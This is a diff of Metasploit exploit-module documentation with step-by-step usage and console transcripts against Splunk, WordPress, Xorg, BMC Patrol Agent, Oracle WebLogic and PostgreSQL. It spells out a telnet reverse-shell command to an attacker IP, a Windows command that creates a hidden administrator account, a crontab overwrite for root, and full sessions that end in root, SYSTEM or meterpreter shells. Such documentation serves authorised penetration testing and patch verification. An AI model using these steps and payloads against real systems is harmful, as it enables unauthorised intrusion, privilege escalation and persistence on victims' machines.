-- ----
0 Automatic
1 Splunk >= 7.2.4 / Linux
2 Splunk >= 7.2.4 / Windows
3 Splunk >= 7.2.4 / OSX
4 Splunk >= 5.0.1 / Linux
5 Splunk >= 5.0.1 / Windows
msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
target => 3
msf5 exploit(multi/http/splunk_upload_app_exec) > exploit
[*] Started reverse TCP double handler on 172.16.165.206:4444
[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
[*] Authenticating...
[*] Fetching state token from /en-US/manager/appinstall/_upload
[*] Uploading file upload_app_exec.tgz
[+] upload_app_exec successfully uploaded
[*] Invoking script command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8kNbt70jYB3aJKPm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100
```
### Tested against splunk-5.0.1-143156 on Ubuntu 10.04
```
msf > use exploit/multi/http/splunk_upload_app_exec
msf exploit(splunk_upload_app_exec) > show options
Module options (exploit/multi/http/splunk_upload_app_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD changeme yes The password for the specified username
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 8000 yes The target port
SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz
USERNAME admin yes The username with admin role to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Splunk 5.0.1 / Linux
msf exploit(splunk_upload_app_exec) > set RHOST 192.168.1.137
RHOST => 192.168.1.137
msf exploit(splunk_upload_app_exec) > rexploit
[*] Reloading module...
[*] Using command: sh -c '(sleep 4597|telnet 192.168.1.129 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.129 4444 >/dev/null 2>&1 &)'
[*] Authenticating...
[*] Started reverse double handler
[*] Fetching csrf token from /en-US/manager/launcher/apps/local
[*] Uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] Invoking script command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uyYJGuNfu2AetK0N;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "uyYJGuNfu2AetK0N\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.137:41432) at 2012-12-07 11:53:35 +0100
id
uid=0(root) gid=0(root) groups=0(root)
```
### Tested against splunk-5.0.1-143156 on Windows XP
```
msf exploit(splunk_upload_app_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Splunk 5.0.1 / Linux
1 Splunk 5.0.1 / Windows
msf exploit(splunk_upload_app_exec) > set target 1
target => 1
msf exploit(splunk_upload_app_exec) > set payload cmd/windows/adduser
payload => cmd/windows/adduser
msf exploit(splunk_upload_app_exec) > show options
Module options (exploit/multi/http/splunk_upload_app_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD changeme yes The password for the specified username
Proxies no Use a proxy chain
RHOST 192.168.1.137 yes The target address
RPORT 8000 yes The target port
SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz
USERNAME admin yes The username with admin role to authenticate as
VHOST no HTTP server virtual host
Payload options (cmd/windows/adduser):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM no Custom group name to be used instead of default
PASS Metasploit$1 yes The password for this user
USER metasploit yes The username to create
WMIC false yes Use WMIC on the target to resolve administrators group
Exploit target:
Id Name
-- ----
1 Splunk 5.0.1 / Windows
msf exploit(splunk_upload_app_exec) > rexploit
[*] Reloading module...
[*] Using command: cmd.exe /c net user metasploit Metasploit$1 /ADD && net localgroup Administrators metasploit /ADD
[*] Authenticating...
[*] Fetching csrf token from /en-US/manager/launcher/apps/local
[*] Uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] Invoking script command
```
After that, on the victim machine:
```
C:\Documents and Settings\Administrator>net user metasploit
User name metasploit
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 12/6/2012 11:19 PM
Password expires 1/18/2013 10:07 PM
Password changeable 12/6/2012 11:19 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
C:\Documents and Settings\Administrator>
```
@@ -0,0 +1,58 @@
On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
## Exploitation Steps
1. Upload an image containing PHP code
2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
3. Perform the Path Traversal by using the `crop-image` Wordpress function
4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
When visiting the post created by the attacker it is possible to obtain code execudion.
More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
## Verification Steps
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
4. Set `LHOST` and `LPORT`
5. Run the exploit: `run`
6. Confirm you have now a meterpreter session
## Scenarios
### Ubuntu 18.04 running WordPress 4.9.8
```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```
@@ -1,40 +1,37 @@
## Description
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
## Vulnerable Application
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
Xorg is more restrictive to exploit under CentOS / RHEL. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
This module has been tested successfully on:
* OpenBSD 6.3
* OpenBSD 6.4
* CentOS 7.4.1708 x86_64
* CentOS 7.5.1084 x86_64
* Red Hat Enterprise Linux 7.5 x86_64
## Verification Steps
On CentOS your session must have console lock. To get a console lock you can login locally with a user.
On CentOS/RHEL your session must have console lock. To get a console lock you can login locally with a user.
1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/multi/local/xorg_x11_suid_server`
4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
5. Do: `set SESSION [SESSION]`
6. Do: `set LHOST [LHOST]`
7. Do: `run`
8. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
## Advanced Options
**Xdisplay**
@@ -43,19 +40,25 @@
**WritableDir**
A writable directory file system path. (default: `/tmp`)
A writable directory file system path (default: `/tmp`)
**ConsoleLock**
**ConsoleLock**
Will check for console lock under linux (default: `true`)
Will check for console lock under linux (default: `true`)
## Scenarios
### OpenBSD
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
lhost => 172.30.0.2
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module.
@@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
```
### CentOS 7.4.1708 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.188:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```
### Red Hat Enterprise Linux 7.5 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.165:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EEdPp66R4es6U3WF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
[*] Reading from socket B
[*] B: "EEdPp66R4es6U3WF\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
[+] Returning session after cleaning
[+] Deleted /tmp/.session-aqxyug0fH
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.5 (Maipo)
```
@@ -0,0 +1,94 @@
## Description
This module exploits the lack of proper authorization checks in the BMC Patrol Agent that allows arbitrary operating system commands to be executed at a higher privilege level than the user being authenticated. The module is simply a ruby implementation of the remote protocol provided by BMC Patrol Agent to execute system commands.
The vulnerability was identified by Ryan Wincey of [Securifera](https://www.securifera.com/) and was assigned [CVE-2018-20735](https://www.cvedetails.com/cve/CVE-2018-20735/) Further details can be found at the [Securifera website](https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/).
## Vulnerable Application
The module affects the BMC Patrol Agent component of [BMC TrueSight Infrastructure Management](https://docs.bmc.com/docs/TSInfrastructure/113/home-774795879.html). The agent is installed on servers managed using BMC TrueSight Infrastructure Management and listens on TCP port 3181. The vulnerability affects versions up to 11.3.
## Verification Steps
To use this exploit you will need access to BMC Patrol Agent.
1. Install the BMC Patrol agent on a host.
2. Ensure that the PatrolAgent service is running and listening on TCP port 3181.
3. Launch `msfconsole`.
4. Load the module `use exploit/multi/misc/bmc_patrol_cmd_exec`.
5. Set the username to authenticate with `set USER patrol`.
6. Set the password for the user `set PASSWORD password`.
7. Set the command to execute `set CMD "whoami"`.
8. Run the exploit `exploit`.
The result should be that the string `nt authority\system` is returned and output.
## Usage Scenarios
The exploit module contains several targets as detailed below.
### Target 0: Windows Powershell Injected Shellcode
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).
msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
RHOSTS => 192.168.162.133
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
LHOST => 192.168.162.128
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
USER => user
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) >
[*] Started reverse TCP handler on 192.168.162.128:4444
[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
[*] 192.168.162.133:3181 - Successfully authenticated user.
[*] Sending stage (179779 bytes) to 192.168.162.133
[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
### Target 1: Generic Cmd
This target can be used with *cmd* payloads to execute operating system commands against the target host.
msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130
RHOSTS => 192.168.162.130
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
LHOST => 192.168.162.128
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol
USER => patrol
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1
TARGET => 1
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) >
[*] Started reverse TCP handler on 192.168.162.128:4444
[*] 192.168.162.130:3181 - Connected to BMC Patrol Agent.
[*] 192.168.162.130:3181 - Successfully authenticated user.
[*] Command shell session 1 opened (192.168.162.128:4444 -> 192.168.162.130:57408) at 2019-02-10 23:05:12 -0500
### Target Cmd Execution: Windows/Unix/Linux
This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
RHOSTS => 192.168.162.133
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
USER => user
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami
msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit
[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
[*] 192.168.162.133:3181 - Successfully authenticated user.
[*] 192.168.162.133:3181 - Command to execute: whoami
[*] 192.168.162.133:3181 - Output:
nt authority\system
@@ -0,0 +1,54 @@
## Vulnerable Application
CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.
Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments. It is downloadable from Oracle once registered for an account. For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`). For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
## Verification Steps
#### Install the application
1. Install the application using the binaries above, with both a WebLogic server and an admin server.
2. When prompted, name the project `base_domain`.
3. When prompted, use a development environment instead of a production environment.
4. When prompted, keep the default port of TCP/7001.
5. When prompted, provide a username and password, and make a note of them.
6. Upon completion of the installer, find and execute the admin server. On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`. On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
7. You may be prompted for the username and password you generated during the install process.
8. Wait for the output: `<Server state changed to RUNNING.>`
#### Checking for the vulnerability
1. Start msfconsole
2. `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.
4. Run the `check` method to confirm exploitability.
5. Look for the following output:
```
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 172.16.135.128:8088 - The target is vulnerable.
```
#### Exploiting the vulnerability
1. Follow the steps in the previous "checking" section.
2. Set the operating system of the target (eg. `set TARGET Windows`)
3. Configure the payload and payload parameters.
4. `run`
## Options
**TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
## Demo
```
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit
[*] Started reverse TCP handler on 172.16.135.1:4444
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49266) at 2019-05-22 14:16:03 -0500
meterpreter >
```
@@ -0,0 +1,38 @@
## Description
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
## Vulnerable Application
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
3. `set rhosts <rhost>`
4. `set rport <srvport>`
5. `exploit`
## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
```
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
rhost => 192.168.192.6
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
rport => 7001
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit
[*] Started reverse TCP handler on 192.168.192.136:4444
[*] 192.168.192.6:7001 - Sending handshake...
[*] 192.168.192.6:7001 - Sending T3 request object...
[*] 192.168.192.6:7001 - Sending client object payload...
[*] Sending stage (179779 bytes) to 192.168.192.6
[*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800
meterpreter > sysinfo
Computer : GIOTTO-HS-W7
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
@@ -0,0 +1,52 @@
## Description
Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
Note that successful exploitation will output the following warning to the admin server console:
```
<Mar 26, 2019 4:13:24 PM CDT> <Error> <RJVM> <BEA-000503> <Incoming message header or abbreviation processing failed
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at $Proxy57.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:327)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
Truncated. see log file for complete stacktrace
```
## Vulnerable Application
Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0.
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/misc/weblogic_deserialize_rawobject`
3. `set rhosts <rhost>`
4. `set rport <srvport>`
5. `exploit`
## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
```
msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6
rhost => 192.168.192.6
msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001
rport => 7001
msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit
[*] Started reverse TCP handler on 192.168.192.136:4444
[*] 192.168.192.6:7001 - Sending handshake...
[*] 192.168.192.6:7001 - Sending T3 request object...
[*] 192.168.192.6:7001 - Sending client object payload...
[*] Sending stage (179779 bytes) to 192.168.192.6
[*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800
meterpreter > sysinfo
Computer : GIOTTO-HS-W7
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
@@ -0,0 +1,51 @@
## Description
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1 are vulnerable to a deserialization vulnerability (CVE 2017-3248) in the core Components subcomponent due to unsafe deserialization of Java objects by the RMI registry and produce a JRMP connection from the target, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
## Vulnerable Application
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1.
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/misc/weblogic_deserialize_unicastref`
3. `set srvhost <srvhost>`
4. `set srvport <srvport>`
5. `set rhosts <rhost>`
6. `set rport <srvport>`
7. `exploit`
8. `sessions -i 1`
## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
```
msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvhost 192.168.192.136
srvhost => 192.168.192.136
msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvport 8888
srvport => 8888
msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rhost 192.168.192.6
rhost => 192.168.192.6
msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
rport => 7001
msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
[*] Exploit running as background job 17.
[*] Started reverse TCP handler on 192.168.192.136:4444
msf exploit(multi/misc/weblogic_deserialize_unicastref) > [*] 192.168.192.6:7001 - Sending handshake...
[*] 192.168.192.6:7001 - Sending T3 request object...
[*] 192.168.192.6:7001 - Sending client object payload...
[*] 192.168.192.6:7001 - Sending payload to client: 192.168.192.6
[*] Sending stage (179779 bytes) to 192.168.192.6
[*] Meterpreter session 9 opened (192.168.192.136:4444 -> 192.168.192.6:49283) at 2018-12-14 11:45:44 -0800
[*] 192.168.192.6:7001 - Server stopped.
msf exploit(multi/misc/weblogic_deserialize_unicastref) > sessions -i 9
[*] Starting interaction with 9...
meterpreter > sysinfo
Computer : GIOTTO-HS-W7
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
@@ -0,0 +1,245 @@
This module attempts to create a new table, then execute system commands in the
context of copying the command output into the table.
This module should work on all Postgres systems running version 9.3 and above.
## Vulnerable Application
Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
Set up the software and connect as the postgres superuser.
Use the techniques described in this blogpost to verify command execution:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
## Verification Steps
You must be able to connect to the PostgreSQL database, and have a valid set of superuser
credentials, or a user in the 'pg_execute_server_program' group
Exploiting Linux/OSX:
1. Start msfconsole
2. use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
3. set RHOST target.ip.add.ress
4. set payload cmd/unix/reverse_perl
5. set PASSWORD postgres
6. set USERNAME postgres
7. set DATABASE postgres
8. set LHOST my.ip.add.ress
9. set LHOST myport
10. exploit
Exploiting Windows:
1. Start msfconsole
2. use exploit/multi/script/web_delivery
3. set target 2
4. set payload windows/meterpreter/reverse_tcp
5. set LHOST my.ip.add.ress
6. exploit -j
7. Copy powershell command, add \ to escape any single quotes
8. use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
9. set RHOST target.ip.add.ress
10. set COMMAND powershell... (Output from Step 7)
11. set PASSWORD postgres
12. set USERNAME postgres
13. set DATABASE postgres
14. exploit
## Options
**TABLENAME**
The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
one each time the exploit is run.
**DUMP_TABLE_OUTPUT**
If enabled this option will perform a select statement on the created table before it is deleted. This can be used for
debugging if there are problems with a command being executed.
**DATABASE**
Name of the database to connect to
**USERNAME**
A valid username that allows access to the database
**PASSWORD**
A valid password that allows access to the database
## Scenarios
### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres
DATABASE => postgres
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres
USERNAME => postgres
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres
PASSWORD => postgres
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18
LHOST => 192.168.0.18
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25
RHOSTS => 192.168.0.25
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no Send a custom command instead of a payload, use with powershell web delivery against windows
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 192.168.0.25 yes The target address range or CIDR identifier
RPORT 5432 yes The target port (TCP)
TABLENAME msftesttable yes A table name that doesnt exist(To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.18 yes The listen address (an interface may be specified)
LPORT 4456 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
